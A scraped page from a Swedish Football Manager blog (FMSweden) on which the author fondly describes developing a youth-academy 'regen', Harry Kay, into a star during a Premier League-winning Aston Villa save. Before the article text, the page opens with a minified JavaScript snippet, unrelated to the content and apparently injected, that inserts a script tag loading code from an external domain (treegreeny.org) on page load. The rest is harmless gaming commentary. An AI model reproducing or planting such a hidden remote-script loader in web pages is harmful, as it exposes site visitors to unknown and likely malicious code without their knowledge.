;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – Kärleken till regens – FMSweden
Meny Stäng

Start of the week – Kärleken till regens

När din ansvariga för ungdomsutveckling ger förhandstitten över årets ungdomsrekrytering och man läser att ”detta kan klassas som en gyllene generation” är det tyvärr sällan ett bra tecken. Allt som oftast är talangerna som kommer upp ingenting att ha. Men ibland sker det. En supertalang dyker upp och gärna med ett högt värde på ”beslutsamhet” och känslan är att hela saven får ett nytt liv.

Precis så var det för mig när jag spelade med Aston Villa. Min bästa save någonsin där jag lyckades vinna Premier League under den åttonde säsongen och en nyckelspelare under säsongen vi vann titeln var en av våra egna. Harry Kay. En spelare som jag fick fram redan under säsong 1 och som gjorde sin A-lagsdebut under säsong 3 där han startade en match och fick hoppa in sju gånger. I början hade han svårt att producera poäng men han utvecklades alltid på ett oerhört fint sätt gällande egenskaperna och sedan under säsong 5, då han hade matchats in mer och mer fram till den säsongen small det till. 3+7 på 31 matcher och sedan dess har han varit gjuten i startelvan.

Att få upp en sådan spelare gjorde att det alltid fanns motivation i mig att spela, en vilja att fortsätta att utveckla en av mina egna för det är något alldeles extra med regens och man skapar ett märkligt band som är svårt att förklara men vi som spelar Football Manager förstår.

Det här är Harry Kay under säsong 9 och som ni ser är det en otrolig fotbollsspelare. Till råga på allt är han nu gjuten i det engelska landslaget och det är ytterligare en grej som är fint med regens. När man har varit med från start och matchat in dem i sitt lag för att sedan se dem gå hela vägen till landslaget. Det är stort!

En bra regen skapar nytt liv till din save och en extra källa till motivation. Harry Kay gjorde min save med Aston Villa till min roligaste någonsin.

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar